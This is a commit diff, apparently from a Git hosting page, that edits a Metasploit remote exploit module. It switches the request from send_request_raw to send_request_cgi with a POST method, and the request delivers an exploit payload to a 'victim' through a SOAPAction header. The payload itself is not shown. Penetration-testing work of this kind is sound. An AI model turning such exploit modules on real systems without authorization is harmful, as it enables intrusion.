Changed the send_request_raw into send_request_cgi function.
parent
675fbb3045
commit
36f275d71a
|
@ -107,9 +107,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Build and send the HTTP request
|
||||
#
|
||||
print_status("Sending exploit to victim #{target.name} at ...")
|
||||
send_request_raw({
|
||||
'uri' => target_uri.path,
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => target_uri.path,
|
||||
'headers' => {
|
||||
'SOAPAction' => sploit,
|
||||
#'User-Agent' => 'Python-urllib/2.7',
|
||||
|
|
Loading…
Reference in New Issue